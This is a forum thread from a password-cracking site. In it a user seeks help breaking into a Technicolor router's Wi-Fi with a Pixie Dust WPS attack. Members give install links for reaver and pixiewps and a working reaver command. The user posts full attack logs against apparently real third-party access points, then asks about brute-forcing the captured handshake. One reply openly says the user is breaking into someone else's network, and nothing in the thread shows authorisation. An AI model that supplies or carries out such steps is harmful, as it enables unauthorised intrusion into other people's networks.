NEW: We have a Discord server now. Click here to go there now!

NOTE: Why not use our List Manager to crack your lists? Its easy and enables better management.

NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - Wireless Cracking - PixieWPS help needed


20 Results - Page 1 of 1 -
1
Author Message
Avatar
HackMania

Status: n/a
Joined: Mon, 16 Nov 2015
Posts: 33
Team:
Reputation: -30 Reputation
Offline
Wed, 25 Nov 2015 @ 23:45:22

I have tried to hack a technicolor router with pixie wps.

I have folowed this tutorial on youtube:this HTML class. Value is http://m.youtube.com

I get to the point where i gather the hash 1 and 2 key.and the aut.key and the pka key.

When i put it togheather to crack the wps pin. It says wps pin not found.

I assume the router is locked some way.

Is therebany other method i could use to break the wps pin and there after get the wpa key?

Or maybe use the hash 1 and 2 and autkey and pka in some other software to break the wpa key?

Thank you for replying


Avatar
95AE6B15

Status: Trusted
Joined: Fri, 23 May 2014
Posts: 2482
Team:
Reputation: 3625 Reputation
Offline
Thu, 26 Nov 2015 @ 00:10:10

Are you using all the keys provided on the same cycle.
Or are you piecing it together. They all have to be from the same cycle.
Also Pixiewps is automated now through reaver assuming that you have the latest verson
from the pixiewps github.
It automatically collect necessary keys, calculates the pin and retrieves the passphrase from a single command line.
Assuming the AP is vulnerable.


Avatar
HackMania

Status: n/a
Joined: Mon, 16 Nov 2015
Posts: 33
Team:
Reputation: -30 Reputation
Offline
Thu, 26 Nov 2015 @ 00:24:32

cvsi said:

Are you using all the keys provided on the same cycle.
Or are you piecing it together. They all have to be from the same cycle.
Also Pixiewps is automated now through reaver assuming that you have the latest verson
from the pixiewps github.
It automatically collect necessary keys, calculates the pin and retrieves the passphrase from a single command line.
Assuming the AP is vulnerable.

I dont know if it is from the same cycle or not.
I can give it a go now again if you wait a little, and make sure it all comes from the same cycle.

I am not sure how to install the latest pixiewps github. Or what the commandline in reaver should be.

When i start kali linux live usb i write in command.

apt-get update
apt-get install reaver
apt-get install usbutils
apt-get install macchanger
apt-get install pixiewps

is there anything else i should install before stating?

could you write the command line i should use with reaver so it calcultes everything automaticly.

Really thank you cvsi!! i have trying to break it for 2 weeks now, so frustrating :(((



Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Thu, 26 Nov 2015 @ 00:29:52

HackMania said:

I have tried to hack a technicolor router with pixie wps.

I think you meant to say,.... you have been asked to test the security of your friends wifi. We don't do hacking here


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
95AE6B15

Status: Trusted
Joined: Fri, 23 May 2014
Posts: 2482
Team:
Reputation: 3625 Reputation
Offline
Thu, 26 Nov 2015 @ 00:34:00

Install this and prerequisits.
https://github.com/wiire/pixiewps


Install this and its requirements.
https://github.com/t6x/reaver-wps-fork-t6x
After that run this


reaver -i wlan0mon -b 00:AA:BB:11:22:33 -vvv -K 1


And plug the proper mac address in.


Avatar
HackMania

Status: n/a
Joined: Mon, 16 Nov 2015
Posts: 33
Team:
Reputation: -30 Reputation
Offline
Thu, 26 Nov 2015 @ 00:35:46

Hash-IT said:

HackMania said:

I have tried to hack a technicolor router with pixie wps.

I think you meant to say,.... you have been asked to test the security of your friends wifi. We don't do hacking here

Sorry :)Yes of course, i am just testing the streanght of the pass. I am not so familiar with the right terms to use


Avatar
HackMania

Status: n/a
Joined: Mon, 16 Nov 2015
Posts: 33
Team:
Reputation: -30 Reputation
Offline
Thu, 26 Nov 2015 @ 00:37:02

cvsi said:

Install this and prerequisits.
https://github.com/wiire/pixiewps


Install this and its requirements.
https://github.com/t6x/reaver-wps-fork-t6x
After that run this


reaver -i wlan0mon -b 00:AA:BB:11:22:33 -vvv -K 1


And plug the proper mac address in.

Thank you so much!! I will give it a go now. Hopefully it works,...


Avatar
HackMania

Status: n/a
Joined: Mon, 16 Nov 2015
Posts: 33
Team:
Reputation: -30 Reputation
Offline
Thu, 26 Nov 2015 @ 00:45:22

HackMania said:

cvsi said:

Install this and prerequisits.
https://github.com/wiire/pixiewps


Install this and its requirements.
https://github.com/t6x/reaver-wps-fork-t6x
After that run this


reaver -i wlan0mon -b 00:AA:BB:11:22:33 -vvv -K 1


And plug the proper mac address in.

Thank you so much!! I will give it a go now. Hopefully it works,...

Cvsi: i feel like an idiot now!!

I am not so confident with how to install the links you posted to me. Sorry, i am ashamed asking you again on how to install it, i feel like a noob. but i have never done it before thats why i am little unsure on how to do.

Should i download the .zip fileand extract it. or how to do it. sorry for my lack of knowledge



Avatar
95AE6B15

Status: Trusted
Joined: Fri, 23 May 2014
Posts: 2482
Team:
Reputation: 3625 Reputation
Offline
Thu, 26 Nov 2015 @ 00:48:28

Download the zips, uncompress them and follow the Installation instructions for each progam.
The instructions are in the links


Avatar
HackMania

Status: n/a
Joined: Mon, 16 Nov 2015
Posts: 33
Team:
Reputation: -30 Reputation
Offline
Thu, 26 Nov 2015 @ 01:45:59

cvsi said:

Download the zips, uncompress them and follow the Installation instructions for each progam.
The instructions are in the links


FINALLY i made the installation. I struggled with it but i manged to install it by watching youtube video.

This is what i got running the command you wrote:

root@kali:~# reaver -i wlan0 -b C4:EA:1D:1D:B7:11 -vvv -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool


[+] Waiting for beacon from C4:EA:1D:1D:B7:11
[+] Switching wlan0 to channel 1
[+] Switching wlan0 to channel 2
[+] Switching wlan0 to channel 3
[+] Switching wlan0 to channel 4
[+] Switching wlan0 to channel 5
[+] Switching wlan0 to channel 6
[+] Switching wlan0 to channel 7
[+] Switching wlan0 to channel 8
[+] Switching wlan0 to channel 9
[+] Switching wlan0 to channel 11
[+] Associated with C4:EA:1D:1D:B7:11 (ESSID: TN_24GHz_1DB711)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 3a:07:10:66:cf:7a:ba:80:08:46:3e:44:a9:9b:2e:bd
[P] PKE: ac:a2:35:0d:81:3f:bd:d6:6f:d0:47:98:dd:24:a7:24:1c:66:5d:b8:a3:01:d8:cf:41:a9:bb:e5:05:b7:41:23:4f:50:90:bb:21:e8:19:2a:98:b0:b5:8e:6f:c6:af:0a:ec:17:07:10:81:9d:56:14:9e:0d:61:7e:06:fb:99:43:34:60:d6:06:29:eb:27:46:4e:05:74:09:fa:62:26:6f:88:22:b9:cb:1f:aa:23:bb:7b:af:42:bb:67:ee:7e:ca:68:e8:6e:22:e3:bc:7e:4d:69:9f:13:76:3d:3b:18:79:dc:c4:a4:31:bc:c9:00:45:7f:1e:73:ac:eb:cd:5f:02:f3:d2:70:30:6c:2c:28:c4:ff:e8:20:61:53:7a:a3:ed:7a:a4:02:a9:05:83:e3:ad:bf:9a:cc:ca:e0:bd:20:73:f8:61:32:5a:37:49:95:d0:9b:4c:a6:2c:80:3e:8d:f7:a4:b2:41:5b:0f:3c:39:fa:7f:13:a4:c5:47:b7:c1:e7
[P] WPS Manufacturer: Technicolor
[P] WPS Model Name: Technicolor TG
[P] WPS Model Number: 789vac
[P] Access Point Serial Number: 1526SAAKH
[+] Received M1 message
[P] R-Nonce: eb:64:88:b0:50:1a:db:2f:d3:c3:11:76:97:54:9b:10
[P] PKR: fc:50:2a:15:4a:71:54:c9:8e:f3:1d:a4:c5:9c:f3:71:c3:47:b4:a0:c4:b4:34:c0:df:1e:13:85:fc:86:51:35:66:25:94:25:4b:69:70:83:c6:d4:fb:70:0d:2f:82:ee:a0:b5:5f:c6:e3:3b:21:58:1e:1d:97:d3:94:6a:fd:f3:10:23:b8:8b:05:bf:fc:f4:78:68:0e:59:2b:17:1b:35:6e:a8:73:05:ef:72:51:72:7d:f2:23:3f:71:6e:41:12:63:2a:58:d9:ce:94:cb:ab:a9:1f:a9:34:dd:2e:18:57:e7:34:7d:79:21:4b:a0:58:10:81:7c:82:f3:81:e7:c0:45:c8:52:2d:d0:a7:81:e8:c8:bb:ec:76:12:73:ee:3f:13:4a:3a:74:57:92:cb:76:f4:57:84:08:7d:44:12:b0:93:9c:ea:28:99:13:77:1d:5b:47:a5:d0:6e:7e:4d:60:9f:12:10:1a:16:57:65:b2:db:ce:52:61:30:6f:41:a7
[P] AuthKey: 5c:5b:92:30:bf:51:e7:08:14:f8:66:43:26:19:63:23:b2:8d:14:60:be:67:21:4f:8b:50:4b:93:17:d4:0c:fc
[+] Sending M2 message
[P] E-Hash1: 34:27:53:91:6d:c2:4d:42:43:bc:b3:de:1e:a0:9d:9c:d7:2e:9c:e3:1f:71:41:28:72:67:79:09:95:75:1a:92
[P] E-Hash2: 3d:49:3b:13:a5:bb:71:f6:38:fe:9c:11:9c:43:5a:c8:c6:e4:df:d8:67:4b:fb:14:12:df:a7:71:3d:4f:6f:77
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust]

  • Time taken: 0 s 270 ms
  • [Pixie-Dust]
    [+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]


    Any ideas what to do now.it seems that it is not able to get the wps pin


    Avatar
    95AE6B15

    Status: Trusted
    Joined: Fri, 23 May 2014
    Posts: 2482
    Team:
    Reputation: 3625 Reputation
    Offline
    Thu, 26 Nov 2015 @ 01:57:21

    It just may not be vulnerable to that attack.
    You may have to just do good old bruteforce and crack the cap file.


    Avatar
    HackMania

    Status: n/a
    Joined: Mon, 16 Nov 2015
    Posts: 33
    Team:
    Reputation: -30 Reputation
    Offline
    Thu, 26 Nov 2015 @ 02:03:13

    cvsi said:

    It just may not be vulnerable to that attack.
    You may have to just do good old bruteforce and crack the cap file.

    Is there no other way left now than bruteforce it? If there is i will try it also. If i bruteforce with my laptop it will take ages to crack it i think


    Avatar
    95AE6B15

    Status: Trusted
    Joined: Fri, 23 May 2014
    Posts: 2482
    Team:
    Reputation: 3625 Reputation
    Offline
    Thu, 26 Nov 2015 @ 02:26:33

    Its possible there are other ways. I just don't know them.


    Avatar
    HackMania

    Status: n/a
    Joined: Mon, 16 Nov 2015
    Posts: 33
    Team:
    Reputation: -30 Reputation
    Offline
    Thu, 26 Nov 2015 @ 02:34:07

    cvsi said:

    Its possible there are other ways. I just don't know them.

    Ok. I understand, i am really glad that you helped me. I will try to upload the .cap file in aircloud-ng. Maybe they can crack it over there. But im sceptical.

    Btw. I ran fork on many diffrent AP. Maybe 10. I only managed to get pin from 1 of them. Some had ap rate limiter. And some had fault code (02x0).



    Avatar
    WPA2

    Status: Cracker
    Joined: Thu, 11 Jun 2015
    Posts: 133
    Team:
    Reputation: 128 Reputation
    Offline
    Thu, 26 Nov 2015 @ 12:43:31

    What's the output of

    wash -i wlan0mon



    BItcoin : 1ME8L8zM7qVrLZvWY2Nyr28N6kqEujCGj5
    General Forum Rules! | Paid Password Recovery Rules
    Submitting WPA Handshakes

    Feel free to rep or donate if i helped you along the way.

    Avatar
    HackMania

    Status: n/a
    Joined: Mon, 16 Nov 2015
    Posts: 33
    Team:
    Reputation: -30 Reputation
    Offline
    Thu, 26 Nov 2015 @ 12:53:17

    WPA2 said:

    What's the output of

    wash -i wlan0mon


    The output is WPS LOCKED . YES .

    Is it impossible to crack it if the wps locked is set yo yes


    Avatar
    HackMania

    Status: n/a
    Joined: Mon, 16 Nov 2015
    Posts: 33
    Team:
    Reputation: -30 Reputation
    Offline
    Thu, 26 Nov 2015 @ 13:35:59

    But when i trying to crack a WPS locked NO it looks like this.

    root@kali:~# reaver -i wlan0 -b 28:C6:8E:71:8E:AF -vvv -K 1

    Reaver v1.5.2 WiFi Protected Setup Attack Tool


    [+] Waiting for beacon from 28:C6:8E:71:8E:AF
    [+] Switching wlan0 to channel 1
    [+] Switching wlan0 to channel 2
    [+] Switching wlan0 to channel 3
    [+] Switching wlan0 to channel 4
    [+] Switching wlan0 to channel 6
    [+] Associated with 28:C6:8E:71:8E:AF (ESSID: ComHem718EAB)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Switching wlan0 to channel 5
    [+] Switching wlan0 to channel 6
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response


    Avatar
    HackMania

    Status: n/a
    Joined: Mon, 16 Nov 2015
    Posts: 33
    Team:
    Reputation: -30 Reputation
    Offline
    Thu, 26 Nov 2015 @ 22:25:02

    I have tried to crack the file with https://aircloud-ng.me/ with their free service, ionlypayif password is recovered.


    The engine failed retreaving the password. But they have worldists also. Is there any wordlist that would maybe find the password??
    I have read that Technicolor maybe have 10 hex uppercase. But i am really not sure. So i dont know what to scoose to crack it??

    Or can you guide me somewhere where i can get i cracked??

    Please help me. I am so frustrated with this!!


    Avatar
    soxrok2212

    Status: Cracker
    Joined: Sat, 24 Oct 2015
    Posts: 455
    Team:
    Reputation: 421 Reputation
    Offline
    Fri, 27 Nov 2015 @ 21:12:58

    If it is 10 hex, then yes it is possible to be cracked and NO you don't need to pretend you are not breaking into someone else's network.



    BTC: 1B4ZAbWYQ399p6QJm3VLbywiCWVSBAXYJ1

    NVIDIA
    1x GTX 1080 Founder’s Edition
    1x GTX 980 Reference Design

    Avatar
    WPA2

    Status: Cracker
    Joined: Thu, 11 Jun 2015
    Posts: 133
    Team:
    Reputation: 128 Reputation
    Offline
    Sat, 28 Nov 2015 @ 09:09:14

    HackMania said:

    WPA2 said:

    What's the output of

    wash -i wlan0mon


    The output is WPS LOCKED . YES .

    Is it impossible to crack it if the wps locked is set yo yes

    That is just a LQ answer to my question, an clearly show's you have no clue what you are doing of course it CANNOT be cracked when wps is locked.


    BItcoin : 1ME8L8zM7qVrLZvWY2Nyr28N6kqEujCGj5
    General Forum Rules! | Paid Password Recovery Rules
    Submitting WPA Handshakes

    Feel free to rep or donate if i helped you along the way.


    20 Results - Page 1 of 1 -
    1

    We have a total of 212138 messages in 26015 topics.
    We have a total of 23009 registered users.
    Our newest registered member is Francescafalk.